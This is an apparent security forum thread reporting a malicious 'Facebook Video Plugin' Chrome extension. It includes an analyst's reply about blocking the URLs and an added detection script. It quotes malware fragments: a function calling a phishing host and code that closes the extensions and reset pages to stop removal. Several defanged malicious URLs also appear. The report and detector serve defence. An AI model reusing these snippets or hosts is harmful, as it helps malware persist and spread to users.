Fake Facebook not detected

hxxp://amk-mt2.com/

If you view the website in Chrome and you try to play the video, it will ask you to install the “Facebook Video Plugin” extension:

hxxps://chrome.google.com/webstore/detail/facebook-video-plugin/akagdpdjofpfkeolfhccmfbahdeokpog

This extension will inject some JavaScript (the main target sites are Facebook and Twitter).
Currently the JavaScript for Facebook:

removed

This script will send messages to your chat partners. And also check this function in it:

function qweqwexd(){ qwecek("hxxp://fun-metin2.com/"+Math.random(0, 9999)); }

Another fake site, and it’s already detected as a phishing site by BitDefender.

The injected script for Facebook comes from here:

hxxp://www.amk-mt2.com/user/s.php

The Twitter injector is inactive now, but here is the location:

hxxp://www.amk-mt2.com/user/t.php

The extension will also block the extensions page (so you can’t uninstall it from there) with this code:

    if (n["url"]["indexOf"]("chrome://extension") >= 0 ||
        n["url"]["indexOf"]("chrome://chrome/extension") >= 0 ||
        n["url"]["indexOf"]("chrome://settings/resetProfileSettings") >= 0) {
      chrome["tabs"]["remove"](n["id"]);
    }

Reported to virus AT avast DOT com
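
Added example, not part of the original post and not Avast's detection: a static check that flags extension JavaScript which both calls `chrome.tabs.remove` and references the internal pages named in the snippet above. The function names and the two benign samples are constructed for illustration; the first sample is the code quoted in the post.

```javascript
// Internal Chrome pages named in the snippet quoted in the post.
const PROTECTED_PAGES = [
  "chrome://extension",
  "chrome://chrome/extension",
  "chrome://settings/resetProfileSettings",
];

// Rewrite obj["prop"] bracket access to obj.prop so the bracket-notation
// spelling used in the post compares equal to plain dotted calls.
// The lookbehind skips array literals such as ["a"] at the start of an expression.
function normalize(source) {
  return source.replace(/(?<=[\w$\])])\[\s*(["'])([A-Za-z_$][\w$]*)\1\s*\]/g, ".$2");
}

// Returns which protected pages a script mentions and whether it closes tabs.
// Only the combination is flagged: either signal alone is common in benign code.
function analyzeExtensionScript(source) {
  const code = normalize(source);
  const closesTabs = /\bchrome\.tabs\.remove\s*\(/.test(code);
  const pages = PROTECTED_PAGES.filter((p) => code.includes(p));
  return { closesTabs, pages, suspicious: closesTabs && pages.length > 0 };
}

// Sample 1: the code quoted in the post (n is the tab object).
const SAMPLE_FROM_POST = `
if(n["url"]["indexOf"]("chrome://extension")>=0||n["url"]["indexOf"]("chrome://chrome/extension")>=0||n["url"]["indexOf"]("chrome://settings/resetProfileSettings")>=0) { chrome["tabs"]["remove"](n["id"]); }
`;

// Sample 2 (constructed): closes a tab but never looks at internal pages.
const BENIGN_CLOSE = `chrome.tabs.remove(tab.id);`;

// Sample 3 (constructed): mentions the extensions page in help text only.
const BENIGN_MENTION = `const help = "Open chrome://extensions to manage this add-on";`;

for (const [name, src] of Object.entries({ SAMPLE_FROM_POST, BENIGN_CLOSE, BENIGN_MENTION })) {
  const r = analyzeExtensionScript(src);
  console.log(name, r.suspicious ? "SUSPICIOUS" : "ok", r.pages);
}
```

The check works on plain source text, so strings that are themselves encoded or built at run time would have to be decoded before it can match them.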

Hi,
Thanks for the report!

I blocked
hxxp://www.adanalibela.com/?bencegomik
hxxp://amk-mt2.com/user/s.php
hxxp://fun-metin2.com/1111

and created detections for the malicious JS code!

Thanks, Honza. It's great to see the avast lab analysts be more active around here. Keep it up :slight_smile: